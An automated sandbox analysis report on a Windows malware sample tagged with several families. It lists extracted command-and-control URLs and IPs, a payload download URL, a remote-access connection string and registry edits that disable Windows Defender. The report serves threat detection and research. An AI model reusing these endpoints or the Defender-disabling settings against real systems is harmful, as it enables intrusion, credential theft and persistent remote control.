Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20250314-en -
resource tags
arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system -
submitted
30/03/2025, 13:34
Static task
static1
Behavioral task
behavioral1
Sample
2025-03-30_0be1d68cb52990f41a783f9b0aba5fc8_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
2025-03-30_0be1d68cb52990f41a783f9b0aba5fc8_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
Resource
win10v2004-20250314-en
General
-
Target
2025-03-30_0be1d68cb52990f41a783f9b0aba5fc8_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
-
Size
938KB
-
MD5
0be1d68cb52990f41a783f9b0aba5fc8
-
SHA1
7823839d432aad2877d8c2ef4f664b209cbc71ba
-
SHA256
a5b959ac59961099a0605032aad6ad96ed577cfe8283bab41acc1efc8a00a1e4
-
SHA512
5347dafacf19ef7437ad2730ecf7ab522b870779989e686d91e918ec3424cf35739e7ee32dca09d86894b3c783195c0c72e12ed70e6099f698efdfbbca8e71e4
-
SSDEEP
24576:mqDEvCTbMWu7rQYlBQcBiT6rprG8a41u:mTvC/MTQYxsWR7a41
Malware Config
Extracted
http://176.113.115.7/mine/random.exe
Extracted
amadey
5.21
092155
http://176.113.115.6
-
install_dir
bb556cff4a
-
install_file
rapes.exe
-
strings_key
a131b127e996a898cd19ffb2d92e481b
-
url_paths
/Ni9kiput/index.php
Extracted
quasar
1.5.0
Office04
goku92ad.zapto.org:5000
a0766e5c-a1d1-4766-a1f5-4e4f9f9fe35a
-
encryption_key
BF72099FDBC6B48816529089CF1CF2CF86357D14
-
install_name
Client.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
Quasar Modded Client Startup
-
subdirectory
SubDir
Extracted
lumma
https://navstarx.shop/FoaJSi
https://metalsyo.digital/opsa
https://ironloxp.live/aksdd
https://starcloc.bet/GOksAo
https://advennture.top/GKsiio
https://targett.top/dsANGt
https://spacedbv.world/EKdlsk
https://galxnetb.today/GsuIAo
https://skynetxc.live/AksoPA
https://byteplusx.digital/aXweAX
https://travewlio.shop/ZNxbHi
https://apixtreev.run/LkaUz
https://tsparkiob.digital/KeASUp
https://appgridn.live/LEjdAK
https://cosmosyf.top/GOsznj
https://esccapewz.run/ANSbwqy
https://touvrlane.bet/ASKwjq
https://sighbtseeing.shop/ASJnzh
https://holidamyup.today/AOzkns
https://triplooqp.world/APowko
https://rodformi.run/aUosoz
https://mtriplooqp.world/APowko
Extracted
stealc
trump
http://45.93.20.28
-
url_path
/85a1cacf11314eb8.php
Signatures
-
Amadey family
-
Detect Xworm Payload 2 IoCs
resource yara_rule behavioral2/files/0x00080000000242b6-424.dat family_xworm behavioral2/memory/1348-437-0x00000000009F0000-0x0000000000A18000-memory.dmp family_xworm -
Detects Healer an antivirus disabler dropper 3 IoCs
resource yara_rule behavioral2/memory/5460-752-0x0000000000850000-0x0000000000CAE000-memory.dmp healer behavioral2/memory/5460-756-0x0000000000850000-0x0000000000CAE000-memory.dmp healer behavioral2/memory/5460-1284-0x0000000000850000-0x0000000000CAE000-memory.dmp healer -
Healer family
-
Lumma family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" ae9ab2f9a7.exe -
Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection ae9ab2f9a7.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" ae9ab2f9a7.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" ae9ab2f9a7.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" ae9ab2f9a7.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" ae9ab2f9a7.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" ae9ab2f9a7.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" ae9ab2f9a7.exe -
Modifies Windows Defender notification settings 3 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications ae9ab2f9a7.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" ae9ab2f9a7.exe -
Modifies security service 2 TTPs 2 IoCs
description ioc Process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Parameters reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Security reg.exe -
Quasar family
-
Quasar payload 2 IoCs
resource yara_rule behavioral2/memory/1696-121-0x000000000C850000-0x000000000C9A4000-memory.dmp family_quasar behavioral2/memory/1696-122-0x000000000C9D0000-0x000000000C9EA000-memory.dmp family_quasar -
Stealc family
-
Xworm family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 15 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 2983c11b74.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 05be0399a2.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempPVHHTNPRDVAAH2JVKPUGUID195KPTH5W.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 0af0a2f978.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 1310185143.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 88e128475c.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ ae9ab2f9a7.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 50981a7f32.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ e2a57b0b34.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ e9ea3a76fa.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 8ffa067850.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe -
Blocklisted process makes network request 6 IoCs
flow pid Process 14 3004 powershell.exe 51 1696 powershell.exe 63 1696 powershell.exe 129 1696 powershell.exe 255 1696 powershell.exe 376 1696 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 12 IoCs
Run Powershell and hide display window.
pid Process 3004 powershell.exe 1696 powershell.exe 1496 PowerShell.exe 5056 powershell.exe 2084 powershell.exe 4684 powershell.exe 2148 powershell.exe 2692 powershell.exe 5640 powershell.exe 6348 powershell.exe 1300 powershell.exe 1456 powershell.exe -
Creates new service(s) 2 TTPs
-
Downloads MZ/PE file 17 IoCs
flow pid Process 139 2324 rapes.exe 139 2324 rapes.exe 139 2324 rapes.exe 14 3004 powershell.exe 124 4324 futors.exe 136 4324 futors.exe 90 4324 futors.exe 245 4324 futors.exe 245 4324 futors.exe 109 4324 futors.exe 319 2324 rapes.exe 391 2324 rapes.exe 29 2324 rapes.exe 29 2324 rapes.exe 76 2324 rapes.exe 76 2324 rapes.exe 76 2324 rapes.exe -
Possible privilege escalation attempt 4 IoCs
pid Process 3476 takeown.exe 4568 icacls.exe 4308 takeown.exe 4320 icacls.exe -
Sets service image path in registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\ScreenConnect Client (f63a82ffaf9f93d1)\ImagePath = "\"C:\\Program Files (x86)\\ScreenConnect Client (f63a82ffaf9f93d1)\\ScreenConnect.ClientService.exe\" \"?e=Access&y=Guest&h=horipalok.top&p=8880&s=d1968bf2-fc89-4cfc-baae-f9f7dd88acf1&k=BgIAAACkAABSU0ExAAgAAAEAAQC5i6E%2fahOoc3QJNQtEoGwqZ%2bCdopTN7JMVjs5O2%2byWcszBbL9cw0U4eUAs0O%2fTt9zZBA51c%2fc1w581kiibjAnZuVNxs1sd0hmNAlDUk8pZ2rgBfiLV%2bCX8Xr1w7PENGbO62O6bYrnCoADRGOr%2bDkAsD9fXZvt2bcWgAU%2fWsucxub7vyrOHFlg0dGlPivlEPgqdF06XmDqh%2bJaT9SNeX8GX5MokmbYgNKFgw6gHkSYgO0gvGb%2bWewn%2ftVekpiuFyJ1lPJvWo313f7%2bPZObMNedjqO8FM2Aja0gP8dtuw0AiY1EQOgSCC3o1fZAl%2fG4Li1yubMjusmlWyPSc3o3%2fusi%2b&v=AQAAANCMnd8BFdERjHoAwE%2fCl%2bsBAAAAFh8gVlHqbEmH0zDp3ue2XwAAAAACAAAAAAAQZgAAAAEAACAAAAC6TKv1jtFFQT3yH%2fBl7f8kigXS3zrmwKewyYttuSj5bwAAAAAOgAAAAAIAACAAAAAq5GrWxMyssSgWCR8DdrHxePUWD8nxOlxSCstVDlBEhKAEAACN%2fp0tk9iWH5BrMd191SYwFtdxhdvymA%2bCSRTs67VbFmw2n0xGjXAavv72BQGWBeovIkOEsJAIoes5FOcbb4xKNGhsaUOt8MSLugX%2f0v%2f7qj5vJ2nHlvx4ofWFEpCNyuSO61j8pQw%2fCKvKx5J%2bUFhGro9Fh3v%2bcZR5ZHgn3oNDhFuKjCXP3z1AzrgnugTe8KAxe1em3l3q99pA48cXmJs5F2RZk%2bfMd1NXoTmbZUWbuUVVv9nTG4Yf%2fX1jZ1fzp7H5vLZkUDQPeBpbfKjJ6VqXwRczLTn3xcU5t6%2fg5H9fNR3%2bsdGLKjO1n3A5rucEgxKHXU6VV30xT5%2bdaxQpWBd8D7GwTHLKAQ3NLZ0eg5QSnJnZyok4mSQnOLg%2b310ZOZIEYs8GdGAx6IA28lK3y7jcPdC6nZEe1pCpDz41clmk%2bvZbwEO%2b0XsvKFApPerlqQh5SceVUvTL9CpXD79yvEZHzfjTNs554Xs4r53oka1oSnxY00oUvaV%2f2csSvIcJI6ptS7%2f2H45a768X5VI6jeH%2bai3yxYTNxK08mA24blfblxj6uK1Ze%2b9%2bkLtja5PxVlYefqypdN%2bYcjEGHjsFVQpu7K64dmVFGy494Tx3mJ1UvTVnUdN0HFGIhcxpXya2zSI08oOAT7s0YLD0sB%2bjTV0jBNuJV0ABq2nW3AWM%2btsSO%2byni1LVQmGxbXsXboFEiPkHmiUSseNxKizaDuNHCVIFg4EHwte5CWvScpIisXjz4%2b4HtLoZ8f5PUvj2dHam1z0BkXW0gSHIMAq1%2f01FQDXwIDZViWWZlcoIldtDt83Spiyh%2fSooCbfAmamTB0W12E7imwgACWcotGSJZ8nzy8mUdOdtxbr8mrHnQn8fd13HxGl%2bPeH%2f2H8w1JYU5gxBSB4YJ1ErLh7ZFKqEKT2Nyf6JN0udO5WX3KeczxcOS3w8kJf%2fy9yD1pQa%2b7FGmnRkRTAltsaPTNM5q0lGQFLoK5H8r9mpJZig%2bYhwR%2bKyMjSLEOqBTNYFVOfWQbsSsB%2f8L9aU%2fYWTV7V06FpdOUSf1D%2bldZ0awiOdrkpFP3TFGLXqORSWCq3jdy5L4rbkkb%2fEZuiKpRWaXMakK84EZe1Q5ztqj0Yji4iq6IcMMnadGNFgcYH82GZWcqqZlMbTI7P0ovvq%2b7Fv4VYideY57G%2b2hzp4onqrLnRfWrOxSeUq7ZEGo8eh5cD6PV%2fw%2fzAND0fjINKL%2bVrTawQQqzJj6TwvEfvAyo0lHIcdbDmhaDyiOx%2bNQiLzvprJge3tasDmZBpYtrp%2f7MkG8%2ftDlhXArcP35mEI%2bUc5pjQCMG7m3m%2fiXBD3jHSWiU7I98hLW4Z9lz55WUR%2fRnpaxZXcUnTr%2b53aMS%2fmlTpycdeg2PxEKbaoez2OAxLifZ34r0OgDdoU1I5aN%2b5IIDxI8kmlonMdxiKY0h3VeMbS2eGFQfHbAw5cN6iDUAVKHHGLJu4f6G2SHluZ9GhRFZ6QzDVDTnLPJgs%2fy%2besgSkvisukfJoFDdlDLVzop6%2f1Fr0qf5RQJQOzunJi%2fkwE1V66aXEu71NzpNLJikbAHjUzkB4nfOszeHPsqrJORkAAAACapLFUhtkjNXwDp7hWo7Z3V0zp23hMUUQ%2fasUGKAv1On%2fx2XNdAgN3I8WUxhUQ86RXvYrYn3SC2itFuGYjeT2f&t=30march\"" ScreenConnect.ClientService.exe -
Stops running service(s) 4 TTPs
-
.NET Reactor proctector 2 IoCs
Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.
resource yara_rule behavioral2/files/0x00080000000242b6-424.dat net_reactor behavioral2/memory/1348-437-0x00000000009F0000-0x0000000000A18000-memory.dmp net_reactor -
Checks BIOS information in registry 2 TTPs 30 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 8ffa067850.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 0af0a2f978.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 50981a7f32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 1310185143.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion e9ea3a76fa.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion e9ea3a76fa.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 2983c11b74.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 88e128475c.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempPVHHTNPRDVAAH2JVKPUGUID195KPTH5W.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion ae9ab2f9a7.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 2983c11b74.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 05be0399a2.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion ae9ab2f9a7.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 50981a7f32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion e2a57b0b34.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempPVHHTNPRDVAAH2JVKPUGUID195KPTH5W.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 1310185143.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 0af0a2f978.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 8ffa067850.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion e2a57b0b34.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 88e128475c.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 05be0399a2.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe -
Checks computer location settings 2 TTPs 16 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Control Panel\International\Geo\Nation rapes.exe Key value queried \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Control Panel\International\Geo\Nation 7d5ce09794.exe Key value queried \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Control Panel\International\Geo\Nation 221.exe Key value queried \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Control Panel\International\Geo\Nation 221.exe Key value queried \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Control Panel\International\Geo\Nation futors.exe Key value queried \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Control Panel\International\Geo\Nation NP4kBrG.exe Key value queried \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Control Panel\International\Geo\Nation 221.exe Key value queried \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Control Panel\International\Geo\Nation 221.exe Key value queried \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Control Panel\International\Geo\Nation Bell_Setup16.tmp Key value queried \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Control Panel\International\Geo\Nation A9cowK5.exe Key value queried \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Control Panel\International\Geo\Nation TempPVHHTNPRDVAAH2JVKPUGUID195KPTH5W.EXE Key value queried \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Control Panel\International\Geo\Nation A9cowK5.exe Key value queried \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Control Panel\International\Geo\Nation apple.exe Key value queried \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Control Panel\International\Geo\Nation amnew.exe -
Drops startup file 4 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_2789eb1e.cmd powershell.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_2789eb1e.cmd powershell.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\smss.lnk NP4kBrG.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\smss.lnk NP4kBrG.exe -
Event Triggered Execution: Component Object Model Hijacking 1 TTPs
Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.
-
Executes dropped EXE 52 IoCs
pid Process 1656 TempPVHHTNPRDVAAH2JVKPUGUID195KPTH5W.EXE 2324 rapes.exe 1040 rapes.exe 972 7d5ce09794.exe 2512 221.exe 3856 221.exe 2544 A9cowK5.exe 212 kO2IdCz.exe 4028 apple.exe 2252 221.exe 2148 221.exe 3752 amnew.exe 4324 futors.exe 4384 ScreenConnect.ClientService.exe 4728 ScreenConnect.WindowsClient.exe 4196 ScreenConnect.WindowsClient.exe 2880 e9ea3a76fa.exe 1332 gron12321.exe 1348 NP4kBrG.exe 2824 v7942.exe 4912 rapes.exe 3368 futors.exe 1764 alex1dskfmdsf.exe 4268 2983c11b74.exe 3968 smss.exe 2856 Bell_Setup16.exe 4028 Bell_Setup16.tmp 3196 Bell_Setup16.exe 2512 Bell_Setup16.tmp 2856 05be0399a2.exe 444 7ef3f93a66.exe 5460 ae9ab2f9a7.exe 5192 bot.exe 6312 bot.exe 6660 0af0a2f978.exe 7060 50981a7f32.exe 5824 389dc2db95.exe 6500 svchost015.exe 6540 8ffa067850.exe 6712 svchost015.exe 2532 e2a57b0b34.exe 5980 e269e6c0d6.exe 4008 svchost015.exe 6288 1310185143.exe 7012 svchost015.exe 7088 842890bd89.exe 5460 88e128475c.exe 6736 A9cowK5.exe 6140 rapes.exe 3268 futors.exe 7060 EPTwCQd.exe 4700 smss.exe -
Identifies Wine through registry keys 2 TTPs 15 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Software\Wine 2983c11b74.exe Key opened \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Software\Wine 1310185143.exe Key opened \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Software\Wine ae9ab2f9a7.exe Key opened \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Software\Wine 8ffa067850.exe Key opened \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Software\Wine e2a57b0b34.exe Key opened \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Software\Wine 88e128475c.exe Key opened \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Software\Wine e9ea3a76fa.exe Key opened \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Software\Wine 05be0399a2.exe Key opened \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Software\Wine 0af0a2f978.exe Key opened \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Software\Wine 50981a7f32.exe Key opened \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Software\Wine TempPVHHTNPRDVAAH2JVKPUGUID195KPTH5W.EXE Key opened \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Software\Wine rapes.exe -
Loads dropped DLL 34 IoCs
pid Process 4840 MsiExec.exe 4568 rundll32.exe 4568 rundll32.exe 4568 rundll32.exe 4568 rundll32.exe 4568 rundll32.exe 4568 rundll32.exe 4568 rundll32.exe 4568 rundll32.exe 4568 rundll32.exe 4320 MsiExec.exe 4128 MsiExec.exe 4384 ScreenConnect.ClientService.exe 4384 ScreenConnect.ClientService.exe 4384 ScreenConnect.ClientService.exe 4384 ScreenConnect.ClientService.exe 4384 ScreenConnect.ClientService.exe 4384 ScreenConnect.ClientService.exe 4384 ScreenConnect.ClientService.exe 4384 ScreenConnect.ClientService.exe 4384 ScreenConnect.ClientService.exe 4384 ScreenConnect.ClientService.exe 3468 regsvr32.exe 5988 MsiExec.exe 3220 rundll32.exe 3220 rundll32.exe 3220 rundll32.exe 3220 rundll32.exe 3220 rundll32.exe 3220 rundll32.exe 3220 rundll32.exe 3220 rundll32.exe 3220 rundll32.exe 4976 MsiExec.exe -
Modifies file permissions 1 TTPs 4 IoCs
pid Process 3476 takeown.exe 4568 icacls.exe 4308 takeown.exe 4320 icacls.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Windows security modification 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features ae9ab2f9a7.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" ae9ab2f9a7.exe -
Adds Run key to start application 2 TTPs 7 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ae9ab2f9a7.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10381480101\\ae9ab2f9a7.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\e269e6c0d6.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10045220101\\e269e6c0d6.exe" futors.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" kO2IdCz.exe Set value (str) \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\smss = "C:\\Users\\Admin\\AppData\\Local\\Temp\\smss.exe" NP4kBrG.exe Set value (str) \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\2983c11b74.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10381450101\\2983c11b74.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\05be0399a2.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10381460101\\05be0399a2.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\7ef3f93a66.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10381470101\\7ef3f93a66.exe" rapes.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Enumerates connected drives 3 TTPs 64 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\M: msiexec.exe -
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral2/files/0x00080000000242d8-699.dat autoit_exe -
Boot or Logon Autostart Execution: Authentication Package 1 TTPs 1 IoCs
Suspicious Windows Authentication Registry Modification.
